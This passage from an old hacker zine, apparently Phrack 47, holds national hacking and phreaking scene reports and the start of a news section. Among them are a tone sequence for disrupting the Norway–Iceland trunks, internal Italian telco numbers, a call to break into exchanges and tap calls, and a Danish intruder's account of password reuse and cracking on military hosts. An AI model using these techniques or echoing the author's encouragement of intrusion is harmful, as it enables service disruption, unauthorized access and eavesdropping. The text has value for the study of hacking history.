  17421. I wonder who he was.  These guys were taken for more serious stuff like
  17422. carding, datapak (x.25), AT&T Alliance conferences, boxing, and general
  17423. abuse of the telephone system.  A couple of shorter raid periods followed
  17424. in 1993, and the scene was pretty much dead - except for the k-rad warez
  17425. kids.
  17426.  
  17427. AT&T and the other big guys we used to bluebox off of have all gone for
  17428. CCIS/CCITT #7 so there is little to be done boxing in Norway now.  Well,
  17429. as a matter of fact I haven't checked that out lately.  An interesting
  17430. thing, though, is that you can temporarily disconnect the complete
  17431. international trunk set between Norway and Iceland by breaking (24+26
  17432. 250ms 26 100ms) on the Iceland Direct line.  Everybody trying to
  17433. _legitimately_ dial an Icelandic number from Norway for a while after
  17434. that just gets a busy signal.  Ha ha.  Poor man's fun.  Wish I could do
  17435. that with the States... :)
  17436.  
  17437. WHAT'S AHEAD FOR THE NORWEGIAN SCENE: I think we should get organized. I
  17438. have a few projects in mind.  There are a lot of security flaws and
  17439. weaknesses yet to be discovered in Norwegian systems and services.  We
  17440. need to get all of Norway scanned for automated answering services and
  17441. carriers.  We need to get into some Central Offices to check out the
  17442. labels on the modems connected to their Ericsson boxes.  We need to get
  17443. trashing.  We need to start talking hacking and phreaking at The
  17444. Gathering.  We need to find data numbers for C.O.s, banks, corporate
  17445. computers, the local McDonalds', we need to get root access at an Internet
  17446. provider and we need to be able to listen in to phone conversations.  We
  17447. will.  Get in touch with me if you'd like to join.
  17448.  
  17449. These were just a couple of thoughts of mine that I wanted to share with
  17450. you fellow hackers out there.  Hope you've enjoyed them.  And for heaven's
  17451. sake, feel free to give me some feedback (via internet: dfp@powertech.no).
  17452.  
  17453. FUN FACTS: Many companies have unconfigured PBXes that you can obtain
  17454. outside dialtone on.  There is no flat rate telephony.  A 28k8 modem
  17455. goes for a little less than $400.  All phone calls are logged, logs are
  17456. erased after a couple of months (presumably).  Only ISDN customers can
  17457. get Caller ID.  There are three cellular operator companies.  All the
  17458. Norway Direct operators are situated in Kongens gate 21, OSLO, Norway.
  17459. The NMT-900 Cellular network doesn't allow calls to Pakistan.  All
  17460. Norwegian babes are young, slim and blonde...not :)
  17461.  
  17462. I'll be releasing a couple of files on Norwegian hacking/phreaking areas
  17463. and techniques in the months to come.  Here's a list of those I am
  17464. planning, haven't written anything yet but I think I will.  If there's
  17465. anything in particular you'd like to add or to get hurried up, or if you
  17466. have information which should be included in these files, then get in
  17467. touch with me.
  17468.  
  17469.   (*) COCOTs and Monopoly operated Pay Phones in Norway
  17470.   (*) MBBS, the Norwegian BBS System; Backdoors and Security
  17471.   (*) Norwegian Telecom; TeleNor.  Organization and computer systems.
  17472.   (*) The Norwegian State Libraries; BibSys network security
  17473.   (*) Telephone Monopoly; current status, what will happen, when?
  17474.  
  17475. Sincerely Yours,
  17476.   Digital Freedom Phanatic
  17477.  
  17478. Yola's to (unsorted, people I know or would like to know):
  17479.   Gizmo, Enemy, Mario, Graham Two (Vishnu), Edison, Roger RamJet, Peter,
  17480.   Gekko, Ozelot, Sicko, Flesaker, Karstad, Arild Leikarnes, Frode1 og
  17481.   Frode2 :-), The Dealer, Saron, Digital Phanatic, SCSI (BayernPower!),
  17482.   SevenUp (damiano?), UrbanMatrix, OnkelD.  Where ARE you guys hiding?
  17483.   ;-)
  17484.  
  17485.  
  17486. ------------------------------------------------------------------------------
  17487.  
  17488.  
  17489.     >-=-=-=-=-=-<
  17490.    <French  Scene>
  17491.     >-=-=-=-=-=-<
  17492.  
  17493.     By  NeurAlien
  17494.  
  17495. The French scene has always been portrayed as weak by both French and
  17496. foreign people.  There's a paradox here:  France was one of the first
  17497. countries to develop a modern network (in 1981) YET there have been
  17498. few _good hackers_.  How is that explained?  I DUNNO !
  17499.  
  17500. In fact, stating that France is underdeveloped at a hacker level is
  17501. partly false.  In France, hackers have always been isolated or hidden
  17502. in little isolated groups.  Whenever a good group formed, everyone was
  17503. quickly busted by DST (the agency in charge of computer fraud).  Moreover,
  17504. this agency (DST) is somewhat effective and hacking has been illegal here
  17505. since 1988.  The risks when you are caught are VERY HEAVY and the trial
  17506. lasts forever!  Usually, it takes 3 years to go to trial and the material
  17507. is ALWAYS seized even if you're not charged with anything!.
  17508.  
  17509. The Videotex initiative that provided France such a breakthrough
  17510. in technology is now an handicap because it can't follow the evolution of
  17511. modems and isn't well adapted for networking with the Internet.
  17512.  
  17513. I- The Videotex aka Minitel
  17514.    ------------------------
  17515.  
  17516. Minitel has been developed in 1981 by France Telecom.  It was excellent at
  17517. the time but it hasn't evolved very much.  Let's see what hacking has
  17518. been like in the Minitel world.
  17519.  
  17520. To explain a little what "Minitel hacking" was, I must detail
  17521. a little how Teletel (the network that supports Minitel) works.
  17522. Teletel is based on X25 and provides multiple price levels:
  17523.  
  17524. Teletel 0 (T0) is free for the user, costs a lot for the server.
  17525. Teletel 1 (T1) costs a local call to the user, the price of the X25
  17526. collect connection to the server.
  17527. Teletel 2 (T2) costs the price of a local call + X25 communication
  17528. (6+ cents per minute) to the user.)
  17529. Teletel 3 (T3) costs T2 + a charge that is reversed to the server
  17530. (costs 20 cents to $1 per minute to the user.)
  17531.  
  17532. A lot of servers are accessible only in T3 for the users.
  17533. The principle of hacking Teletel was to find a the X25 number corresponding
  17534. to the T3 CODE in order to log on the T3 server from T2 level.
  17535. Eventually, there could be a password on the T2 access.
  17536.  
  17537. Actually, it's very basic and very dumb hacking since you can only do
  17538. some scanning to find the x25 number of the servers.
  17539.  
  17540. T1 was used for more professional type servers and the hackers
  17541. that used to hack T1 were better than T2 hackers.
  17542.  
  17543. T2 K0d3z were very popular among wannabe hackers, some Special Interest
  17544. Groups about T2 were formed on a lot of servers and there was even a server
  17545. dedicated to T2 codes.  The quality of information has always been extremely
  17546. low in this kind of club.  Moreover, the kind of k0dez kidz on these SIGs and
  17547. servers were particularly dumb (sorry for them).  It got really bad in 1991
  17548. when a lot of T2 guys started to flame each other, accusing them of leeching
  17549. some T2 codes from one server and posting them to another, saying that the
  17550. other guys were ripping everyone off etc...   It may be continuing now but I'm
  17551. totally uninterested by these people so I completely left this scene.
  17552.  
  17553. The "good ones" of the T2 K0d3z k1dz stopped T2 (it's not free so it's
  17554. too expensive!).  They usually started to Hack T0 which is totally free.
  17555. (it's like a 1-800 for Teletel).  The servers of T0 are nearly all of the
  17556. "restricted access" kind.  But they have weak protection schemes and can
  17557. be easily bypassed with some experience.  The hackers of T0 servers don't
  17558. usually know each other and some of them may form a kind of little "islands".
  17559. (I'm calling them "islands" because it is always placed in an Information
  17560. System on T0, deep within the system.  There are perhaps 10 or so "islands"
  17561. that have no connection with other hackers.  A typical "island" consists of
  17562. 5 to 10 hackers.  Some hackers may go on 2 or more "islands" but prefer to
  17563. keep the presence of both "islands" secret. Why? In order not to destroy
  17564. both if one of them is found and shut down!
  17565.  
  17566. One reason most never heard of these person is that there is nearly
  17567. no connection between the Teletel world and the Internet. The only way
  17568. to escape to Internet and Intl X25 is Teletel 1 (T1).
  17569.  
  17570. II- When Teletel goes professional
  17571.     -------------------------------
  17572.  
  17573. As I said, the T1 is the only way for a Teletel hacker to evolve
  17574. to hacking Internet or International & ASCII X25.  On Teletel 1, you can
  17575. sometimes log on to some interesting Unixes, Vaxes etc.
  17576. T1 is also the only way on Teletel to use the International X25 network.
  17577. You have to get a Transpac NUI to call a foreign address from T1.
  17578. Until 1991, the Transpac NUIs were a 4 to 6 random alphanumeric
  17579. characters.  A man called IER had made an NUI Scanner that allowed him to
  17580. find NUIs by scanning out every 4 character NUI.  It WAS effective,
  17581. but Transpac changed to a 6 character NUI.  (IER was busted and caught.
  17582. No news from him since that day!)
  17583.  
  17584. Many good hackers used T1 a lot to hack systems and to go on the Internet
  17585. and the Intl X25 networks.  For example, you may have heard of people
  17586. like Netlink, Furax, Jansky or Synaps.  They hacked X25 and Internet but
  17587. it seems that each of them was busted and caught.  Some are still alive on
  17588. the Net, but some aren't!!!
  17589.  
  17590. Some French hackers were really good but it seems that no one can hide
  17591. very long from the DST.  They are very effective, and with the help of
  17592. France Telecom, they trace back a lot of calls.
  17593.  
  17594. Places like QSD haven't been used very much by the French because of
  17595. their lack of technological knowledge. ahem...
  17596.  
  17597. Moreover, QSD/The Line is tapped by governmental agencies so g00d French
  17598. hackers don't like it.
  17599.  
  17600. IV- The groups
  17601.     ----------
  17602.  
  17603. Some groups have been formed in France but they've never lived long enough
  17604. to give new hackers the knowledge of the old hackers.  Some groups were:
  17605. NICK, Hardcore Hackers, Piratel, TeKila Underground.  Many of them
  17606. were hacking systems in Teletel 1.
  17607.  
  17608. A group called CCCF appeared in 1991.  It was founded by Jean Bernard
  17609. Condat and in fact it was not really a group.  This guy, JBC, is deft
  17610. at maneuvering people into doing what he wants.  He organized fake contests
  17611. like "The price of the Chaos" to get more information and then act as
  17612. if he personally discovered the hacks that were given to him.
  17613.  
  17614. He recently started the Chaos newsletter where nothing originates from
  17615. him...it's taken from everywhere and from his personal contacts.
  17616.  
  17617. He has big power because he works for SVP which is a private
  17618. information company that has the goal of providing information to whoever
  17619. wants it, for a large amount of money.
  17620.  
  17621. Nobody knows what JBC really wants but he is definitely a threat to the
  17622. underground.  Somebody, I don't recall who, already mentioned that in Phrack.
  17623.  
  17624. V- Phreaking in Phrance
  17625.    --------------------
  17626.  
  17627. Phone phreaking became really active in France in 1992 after the
  17628. massive release of a blue box that worked in France.  Several months
  17629. later discovery of this caused the death of blue boxing from France.
  17630.  
  17631. The blue box program was running on ST and several people that used it
  17632. formed the TeKila Underground.  As far as i know, this was an happy group
  17633. that had a lot of parties and liked smoking... :)
  17634.  
  17635. They weren't very effective: just into using the blue box.
  17636.  
  17637. Then came the movement of the "Horlogers", it was due to the credit you
  17638. could gain if you connected in Teletel 3 on some server.  The "horlogers" were
  17639. staying HOURS and DAYS on a server with blue box just to have more credit
  17640. (counted in minute of connection) on those server.
  17641. They were staying connected on a place called "L'horloge" (the timer) that
  17642. enabled you not to be disconnected by the server when being idle for a long
  17643. time.
  17644.  
  17645. Blue boxing is now very hard in France.  The Australian blue box
  17646. ceased to work and a lot of phreakers couldn't phreak anymore.
  17647.  
  17648. The real problem in France is that nobody (or almost nobody) knows how
  17649. the France Telecom phone network works so we can't really use any flaws
  17650. in this system.
  17651.  
  17652. Calling cards have been heavily used in France, placing the country
  17653. in the top ten consumers of stolen CC's.  When AT&T & MCI saw that,
  17654. they contacted France Telecom and now each calling card from AT&T, MCI
  17655. can't call back to France.
  17656.  
  17657. Moreover, FT's CC called "Carte France Telecom" (CFT or CP) is traced and
  17658. recorded: I mean, when the person who owns the CFT receives the bill,
  17659. written on the bill is the number of the caller and of the called party.
  17660.  
  17661. HARD isn't it?
  17662.  
  17663. Recently, some busts were done on AT&T and MCI CC users.  They are now
  17664. awaiting trial.
  17665.  
  17666. VI- Magazines
  17667.     ---------
  17668.  
  17669. Back before 1990 a magazine was published twice and sent to every
  17670. single university in France. It was called "Hackito" from the
  17671. "Hackito ergo sum" motto.  (I've never found an issue of it, but if you have
  17672. one, send me it to me in email.)
  17673.  
  17674. There is also this shitty zine called Chaos...
  17675.  
  17676.  
  17677. Now, a new zine is making the underground react in France:
  17678. It's called "N0 Way" and I'm the Editor.
  17679.  
  17680. This magazine is written entirely in French. The current issue is number 3.
  17681. Anyone wanting to submit something to "N0 Way" can send me a message in Email.
  17682.  
  17683. Today we are seeing a lot of people in France wanting to know more about
  17684. hacking.  It seems to have taken off here but not as much as in Holland or
  17685. in the USA.
  17686.  
  17687. Email me to receive "N0 Way": an133729@anon.penet.fi
  17688.  
  17689.                                                         ++NeurAlien.
  17690.  
  17691. ------------------------------------------------------------------------------
  17692.  
  17693. The Italian Scene
  17694. by
  17695. Zero Uno
  17696.  
  17697. Italy, as you know, is among the industrialized EEC powers.  It deserves
  17698. this honor only to the work of talented people, not by its government,
  17699. which is utterly idiot and totally unable to fulfill the needs of the people.
  17700. This characteristic inevitably has conditioned the whole telecommunication
  17701. market, both phone and networks, which must make clever long term decisions,
  17702. something that Italian government is not able to do.  The phone company is
  17703. owned by the government through Italy Telecom (IT), the new society formed by
  17704. the previous three state-owned firms involved in communications.  In the
  17705. last five years IT has undoubtedly made good work, but the quality of phone
  17706. connections and service was so bad in the past, that many people feel very
  17707. upset when comes to talk to IT.
  17708.  
  17709. The Telephone System
  17710.  
  17711. Italy is divided in 220 telephone districts, each with its own unique
  17712. prefix:  a zero followed by a number (up to three digits).  In addition there
  17713. are a few special prefixes in order to access cellular phones (0335,0336) or
  17714. to reach some 'fake' locations (0769), like many tv programs that use the
  17715. telephone to reach people.  (Like 555 in the USA) In this way IT protects
  17716. itself from line congestions when successful TV-progs are involved.  All
  17717. kind of modern connections are availabl.  This means that payphones, pagers,
  17718. cellulars (ETACS and GSM), radio (an old, now unsupported phone for cars in
  17719. 400 Mhz range) are present.  Another strange beast is televoting (0869) a fake
  17720. prefix that holds the number of incoming calls for polls.  It was used to
  17721. test some political decisions, but the hack here was so evident (the redial
  17722. button) that now televote is not so well thought of.
  17723.  
  17724. Standard Numbering
  17725.  
  17726. The numbers that begins with the digit '1' are reserved for special services.
  17727. This include all amenities like emergency numbers (113, roughly the equivalent
  17728. of American 911), 187 (an all-but-everything number for all requests to IT,
  17729. such ordering a new phone, installing a new line and so on) and toll free
  17730. numbers 167[0 or 8] xxxxx.  As a reminder about IT's long term planning
  17731. capacity, the toll free numbers started as 1678-xxxxx, but were so successful
  17732. that IT was forced to add the 1670-xxxxx later |-(!  All 1678-7xxxx are in
  17733. use by foreign phone companies, and heavily scanned |-).
  17734.  
  17735. Some pretty numbers:
  17736.  
  17737.   1678-72341   A promo for a XXX-rated line (in north or south america)
  17738.   1678-70152   See the following capture
  17739.  
  17740. ---------------------------------- CAPTURE -------------------------------------
  17741.  
  17742.                 ˜˜˜˜˜˜˜˜˜˜˜˜  OFFICIAL USE ONLY  ˜˜˜˜˜˜˜˜˜˜˜˜
  17743.           …ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕª
  17744.           ∫                       FAMNET (sm)                     ∫
  17745.           ∫      ˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜      ∫
  17746.           ∫                        AFAS HQ                        ∫
  17747.           ∫                          and                          ∫
  17748.           ∫                        AF FSCs                        ∫
  17749.           ∫      ˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜˜      ∫
  17750.           »ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕº
  17751.  
  17752. This system is for the use of authorized users ONLY. Individuals using this
  17753. computer system without authority, or in access of their authority, are subject
  17754. to having all of their activities on this system monitored and recorded by
  17755. system personnel. In the course of monitoring individuals improperly using
  17756. this system, or in the course of system maintenance, the activities of
  17757. authorized users may also be monitored. Anyone using the system expressly
  17758. consents to such monitoring and is advised that such monitoring reveals
  17759. possible evidence of criminal activity, system personnel may provide the
  17760. evidence of such monitoring to law enforcement officials.
  17761.  
  17762. Line trace initialized...........................................
  17763.  
  17764. We now have your phone number......WE TRACK HACKERS AND ADVISE AUTHORITIES.
  17765.  
  17766. ---------------------------- END OF CAPTURE --------------------------------
  17767.  
  17768. Unfortunately IT does not support caller ID, so the last sentence is pure
  17769. crap.
  17770.  
  17771. The above numbers are (obviously) all public. These ones are 'reserved'
  17772. for internal use, though many many people play with 'em:
  17773.  
  17774.     135             BBS to record maintenance procedures
  17775.     138             BBS or human operator (depend on districts)
  17776.     1372            Ring-back
  17777.     1391            Human operator
  17778.     160             Security service (???)
  17779.     1414            A yet-to-be-implemented service, that enables a user
  17780.                     to use one phone and bill on their own phone the
  17781.                     subsequent call. Will be implemented |-)?
  17782.  
  17783. Not all districts support this, and since they are not public they can change
  17784. rapidly.  Also present are the country direct numbers in the 1721xxx format.
  17785.  
  17786.     Country         Code
  17787.     -----------------------------
  17788.     Argentina       054
  17789.     Brazil          055
  17790.     Chile           056
  17791.     AT&T            011
  17792.     MCI             022
  17793.     Sprint          877
  17794.  
  17795. Services Offered
  17796.  
  17797. With the advent of digital COs, 'new' (new to the Italian market, anyway)
  17798. services were provided.  The so called STS (additional telephone services)
  17799. allowing (obviously paying) the teleconference (three user talking
  17800. simultaneously), incoming call signal when you are talking with another
  17801. party, and finally calling transfer, useful when you are away from home.
  17802. The current pulses billed can be inquired (paying one pulse, obviously!).
  17803.  
  17804. The Packet Networks
  17805.  
  17806. There is only one packet network provider, ITAPAC (DNIC 2222).  As with other
  17807. packet networks, the access is available with a PAD that accepts only NUI
  17808. accounts (non-reverse charging) and those who accept reverse-charge calls
  17809. (in ITAPAC lingo, the 'easy way').  These are heavily hacked because it is
  17810. the most widespread network in Italy (and the most unreliable, insecure, *bad*)
  17811. and also because some NUI users simply were not aware of the costs of this kind
  17812. of service, and they have payed all the phreakers' bills too!
  17813.  
  17814. Sometimes, for promotional sales, some NUIs were discharged to the public.
  17815. Other were disseminated by phreakers, collected by PAD (only a few NUIs are
  17816. valid across different PADs, most aren't).  Until some time ago QSD France
  17817. was the most 'in' PAD site.  Another common activity was surfing across
  17818. Packet Networks of different states.  Now many common NUIs were deleted from
  17819. system, but some still survive.  Many times the net is unusable because
  17820. has reached its maximum load or because of for system outages.  Also, even
  17821. if the ports run at 2400 bps, is not uncommon to reach the same speed of a
  17822. 1200 bps connection.  Use it if you don't pay or pay a limited fee for it.
  17823.  
  17824. The H/P/C/V Scene
  17825.  
  17826. Common folklore depicts Italians as adaptable to unfriendly environments in
  17827. a clever way.  Although these rumors are not completely true, there is an
  17828. Italian way of H/P/C/V.  Hacking in Italy is not a common activity.  There
  17829. are several teens who spent lot of effort to learn some tricks, but they
  17830. are teens, with all pros and cons.  Rarely do these individuals survive the
  17831. 20 years-old barrier, for one reason or another.  Those who survive generally
  17832. self-limit their actions to a restricted area, and generally remain anonymous.
  17833. The few that remain are the brightest, with lot of know-how and abilities.
  17834. I only know two people at this top rank level.  Hacking is focused on setting
  17835. up unauthorized fsp sites in university computers, removing licenses to pro
  17836. warez and gaining illicit access to some resources in internet or in ITAPAC.
  17837. ITAPAC is now no longer a key issue since ITAPAC (and Italy in general) has
  17838. very few computing resources, and ITAPAC has severe security problems, so it
  17839. is predated by hacker wannabees.  Also Italy lacks of H/P groups like
  17840. LOD,MOD and the CCC. Apart from Omega Team, to my knowledge no other group
  17841. has existed.
  17842.  
  17843. Phreaking used to be fairly common, but now is much less so because of
  17844. new digital COs and stricter security.  Blue boxing to USA was *very* common
  17845. until January 1, 1992.  On this date, the software that controls the traffic
  17846. over North America was changed, and boxing to USA is no longer possible.
  17847. Carding now is the only phreak access, and is used mainly by warez board
  17848. sysops.  Rumors said that the software update was imposed on ITALCABLE (that
  17849. manages international calls) by AT&T due to the *huge* illicit traffic between
  17850. Italy-USA.  Basically, too many people, even non H/P ones ('friends of
  17851. friends') were using blue-boxes even without the faintest idea of how they
  17852. worked.  Some hackers have sold boxes to normal people, and this probably was
  17853. the key to the blocking of illicit calls.  Now, to my knowledge, is possible
  17854. to box only to Chile, Argentina and some other third-world countries.
  17855.  
  17856. True H/P BBS are few.  One, Pier Group's BBS was the most famous, in part
  17857. because one member, MFB (short for MF the Best, basically the best Italian
  17858. phreaker in my opinion), has written a series of humorous stories about
  17859. hackers and lamerz, that had a phenomenal success.  But since Pier (the
  17860. sysop) was also invloved in some other illegal activities apart phreaking
  17861. (stolen hardware, carding), and in this kind of activity too much advertising
  17862. equals certain arrest, the board went down.  Most other BBS are
  17863. warez-oriented, with warez from THG, Razor 1911 and other USA crack groups.
  17864. Note however that unlike other nations, Italy has no group HQs:  what counts
  17865. is money, not being part of a group.  Many BBS are double-sided:  one a ligit,
  17866. more or less lame, part of a legal net like FidoNET, the other accessible only
  17867. to subscribers, with warez.  This has changed however since the Italian Hacker
  17868. Crackdown.  This is not because the police raided the warez boardz (they are
  17869. too ignorant to do this) but because warez sysops, in fear of being caught,
  17870. have (temporarily) closed their BBSes.
  17871.  
  17872. Virusing has some players, though not very publicized, for obvious reasons.
  17873. One has recently become famous (Dr.  Revenge) for his contributions to
  17874. Insane Reality, another H/P/V journal that published some 'secret'
  17875. telephone numbers for United Kingdom officials.
  17876.  
  17877. Nothing really new in Italy, as you can see.  Newspapers are (as are most
  17878. people) too ignorant to correctly report these problems, with the result being
  17879. that the 'legal' portion of network fanatics fear other unjustified police
  17880. raids, and legislators are becoming very unfriendly when dealing with this
  17881. kind of communication.  Several politicians and media moguls are proposing
  17882. laws that forbid anonymous access to the Net, and universities are very
  17883. concerned about these subjects.  Two students were recently arrested because
  17884. they used illicit (but almost public) passwords to surf the net (*only* to
  17885. see things, *no* data damage).
  17886.  
  17887. Italy may one day become very unfriendly to net people, even if Italians are
  17888. generally considered very friendly.
  17889.  
  17890. Zero Uno
  17891. mc1671@mclink.it *only* using PGP, otherwise no response.
  17892.  
  17893. -----BEGIN PGP PUBLIC KEY BLOCK-----
  17894. Version: 2.3
  17895.  
  17896. mQCNAi7zXJ0AAAEEAM3SZQp0+By7fi7ey/oiTU6TT5CdMYdkYnkDeM8f2bZ75Pdp
  17897. 4mv9C0BTVRP0UrYgJO1I+8YrwvSjZK7+U3hty+c97RJ5lnSYQ0BbF7puSwhUxj4W
  17898. AyytlQZVP6j1r4H8ulse1arIVlD9h2+GceXOx09J5uEqqhRG/uo1W3A51ixFAAUR
  17899. tBtaZXJvIFVubyA8bWMxNjcxQG1jbGluay5pdD4=
  17900. =9GnS
  17901. -----END PGP PUBLIC KEY BLOCK-----
  17902.  
  17903. ------------------------------------------------------------------------------
  17904.  
  17905. THE DANISH SCENE BY LE CERVEAU
  17906.  
  17907. In the last issue of Phrack (46) I read an article about the Danish
  17908. Computer Underground. Though, I was pleased with the text, a lot of
  17909. stuff has happened since which I hope most of you have heard about.
  17910. Anyway, here's an update..
  17911.  
  17912. In short, most (nearly all..) of the Inner Circle hackers in Denmark
  17913. have been busted.  It all went down December 1993 where I,
  17914. Descore (Zephyr), Dixie (Nitecrawler) were busted at exactly the same
  17915. time.  After the 3 busts several more followed: WedLock, Netrunner,
  17916. Darkman + some others. I had to spend 14 days in isolation while the
  17917. others were released (somewhat due to my own stupidity).
  17918.  
  17919. The busts were made because all of the universities in DK had been
  17920. more or less taken over by hackers and the FBI + CERT & ASSIST
  17921. worked together.  The police told me that UNI*C was threatened to be
  17922. cut off the Internet if the hacking from Denmark didn't stop (don't
  17923. think that's the truth though. They bullshit alot..).
  17924.  
  17925. So, of course the Danish police had to do something and they asked
  17926. the infamous Joergen Bo Madsen for help.  And they got it.  And the
  17927. situation in DK was getting out of control too - the Phone Company
  17928. was hacked, DK's main research center hacked.  No damage to ANYTHING
  17929. was done though, but naturally we had to be stopped.  Actually, the
  17930. Phone Cmp. screwed up their own system trying to stop us - and now
  17931. they blame us!
  17932.  
  17933. Now we're all awaiting trial.  It might take a while, since they
  17934. said they'd start 'breaking' the PGP-encrypted files with UNI*C's
  17935. computers ;).... I'd think if they did that, it'd be quite a while
  17936. before trials!
  17937.  
  17938. Busted in DK: Zephyr aka Descore, Dixie, WedLock, Netrunner,
  17939.               Darkman, Lazarus, Jackal and me (LC).. + Joshua -
  17940.               some idiot who might have helped the police a whole lot.
  17941.  
  17942. After the bust of Jackal the police says they can't handle anymore so
  17943. there won't be any.
  17944.  
  17945. ----------------------------------------------------------------------
  17946.  
  17947. BUSTED
  17948. BY LE CERVEAU
  17949.  
  17950. I've been busted. Why speak out loud? Why not? I'm screwed anyway.
  17951.  
  17952. I was stunned. About six-seven months before my bust I succeeded in
  17953. breaking into a Pentagon computer (pentagon-emh4.army.mil -->
  17954. otjag.army.mil). What actually launched my interest in this computer
  17955. was a file about UFOs where it was listed. Now I have realized that had
  17956. I found anything top secret about UFO cover-ups I probably wouldn't have
  17957. released it. It wants to be free - but the question is to what degree..
  17958. I knew of course that it couldn't be one of their top secret computers
  17959. (actually, OTJAG=Office of The Judge Attorney General - AFAIR) but I
  17960. also knew that it would be the start of something big - one thing
  17961. always leads to another.
  17962.  
  17963. After a couple of weeks on the system, doing nothing but leeching
  17964. all the mail I could get my hands on I discovered that one of the
  17965. majors used an Air Force base-server (flite.jag.af.mil - AFAIR). As
  17966. I suspected, all I had to find was his login - the password was
  17967. exactly the same. And again this had to lead to more and it did.
  17968. I found some stupid sergeant who also was a user on TACOM
  17969. (Tank Automotive COMmand). Surely, even though stupid he wouldn't
  17970. use the same.. - yup, he did. Access to tacom-emh1.army.mil and
  17971. all their other machines granted. If you want one of the
  17972. largest lists of MilNet sites then grab /etc/hosts from TACOM.
  17973. After gaining SU-access on this machine interesting things started
  17974. happening. If, for example, an officer was to issue some order (of
  17975. course not any orders concerning war) it'd look something like
  17976. this:
  17977.  
  17978. You have to report at HQ Monday latest. Your travelling plans
  17979. for the international conference <blah> <blah> <blah>..
  17980.  
  17981.                                   // Signed //
  17982.                                 Col. Joe Wilkins
  17983.  
  17984. and then some more approved signatures would follow by some
  17985. other persons. Of course I grabbed all the mail on TACOM.
  17986.  
  17987. After a month or so I was locked out of the Pentagon system -
  17988. and it changed it's address to otjag.army.mil. But I didn't
  17989. really care. I knew MilNet pretty good so why not I thought..
  17990.  
  17991. I started thinking military-systems only - a dangerous thing
  17992. to do. I ended up using all my time on it and was therefore
  17993. also rewarded. Soon I would have access to more than 30 military
  17994. systems around the globe and I knew I was getting in over my head
  17995. but I had to keep going - I felt there was no way back. I could
  17996. have told myself that having to hide on all of these systems
  17997. would be almost impossible. But things seemed to be going just fine.
  17998. Just how idiotic can you get?
  17999.  
  18000. With access to some CM-5's and a CM-200 at Naval Research Labs
  18001. and all the wordfiles in the world no system stupid enough to
  18002. let their passwd-file get taken stood a chance - one account with
  18003. encrypted passwd was enough. All I had to do was start Crack on
  18004. the CM-200 and wait.
  18005.  
  18006. I took interest in some of the government machines - they weren't
  18007. as hard to hack as the mil's and I soon lost interest. Except in
  18008. NASA. I got in on one of their smaller machines (*.gsfc.nasa.
  18009. gov) and I knew I just had to wait and it would lead to something
  18010. more.
  18011.  
  18012. Now 'strange' things started happening. Imagine this: I log in
  18013. on TACOM. I log out. When I try to log in again it's impossible
  18014. from the same site; I have to use another - that's when I knew
  18015. that someone was watching my every step, trying to stop me. Later
  18016. it started happening to me no matter how I accessed the nets. That's
  18017. when I knew the end was near. A month later I was busted by
  18018. the FBI in Denmark - that's the way I feel even though it was the
  18019. Danish police. Actually, the trace was made through *.wwb.noaa.gov
  18020. which I was using a while for cracking.
  18021.  
  18022. That's my story - very shortened! If anyone is interested in details
  18023. mail me at Restricted Access # +45-36703060.
  18024.  
  18025. Last Words: Don't do it - don't do it.. It'll get you into all kinds of
  18026. shit.. Why bother the nice governments and their so trustworthy agencies?
  18027. On second thought: Just do it!
  18028.  
  18029. [Editors note:  Along with this file I was sent a capture of one of
  18030.  the aforementioned hacks (which I promptly deleted).  It looked like
  18031.  our Danish friends were in a host at the office of the Judge Advocate
  18032.  General.  Knowing how the JAG is going to handle cases isn't exactly
  18033.  the kind of thing anyone in the military really wants floating around.
  18034.  I guess they need better security, eh? ]
  18035.                               ==Phrack Magazine==
  18036.  
  18037.                  Volume Six, Issue Forty-Seven, File 22 of 22
  18038.  
  18039.               PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
  18040.               PWN                                             PWN
  18041.               PWN              Phrack World News              PWN
  18042.               PWN                                             PWN
  18043.               PWN        Compiled by Datastream Cowboy        PWN
  18044.               PWN                                             PWN
  18045.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  18046.  
  18047.  
  18048. 3 Residents Investigated In Theft Of Phone Card Numbers            Oct 10, 1994
  18049. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18050. by Russ Britt (Los Angeles Daily News)
  18051.  
  18052. Three Los Angeles residents have come under investigation in connection with
  18053. the theft of 100,000 telephone calling card numbers used to make $50 million
  18054. worth of long distance calls, officials said.
  18055.  
  18056. The Secret Service searched the suspects' residences over the past two weeks
  18057. and found computer disks containing calling card codes, said Jim Bauer,
  18058. special agent-in-charge of he Los Angeles office.
  18059.  
  18060. Ivy J. Lay, an MCI switch engineer based in Charlotte, N.C., was arrested
  18061. last week in North Carolina on suspicion of devising computer software to hold
  18062. calling card numbers from carriers that route calls through MCI's equipment,
  18063. the Secret Service said.
  18064.  
  18065. Lay is suspected of supplying thousands cards of calling codes to accomplices
  18066. in Los Angeles for $3 to $5 a number, Bauer said.  The accomplices are
  18067. suspected of reselling the numbers to dealers in various cites, who then sold
  18068. them to buyers in Europe, Bauer said.
  18069.  
  18070. European participants would purchase the numbers to make calls to the United
  18071. States to pirate computer software via electronic bulletin boards.
  18072.  
  18073. -------------------------------------------------------------------------------
  18074.  
  18075. Revealed: how hacker penetrated the heart of British intelligence  Nov 24, 1994
  18076. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18077. by Tim Kelsey (The Independent) p. 1
  18078.  
  18079. [ In typical British style, The Independent boasts 3 FULL pages on the
  18080.   story of how a "hacker" broke into British Telecom's databases and pulled
  18081.   information regarding sensitive numbers for the Royal Family and
  18082.   MI 5 & 6.
  18083.  
  18084.   Reportedly, information was sent anonymously to a reporter named Steve
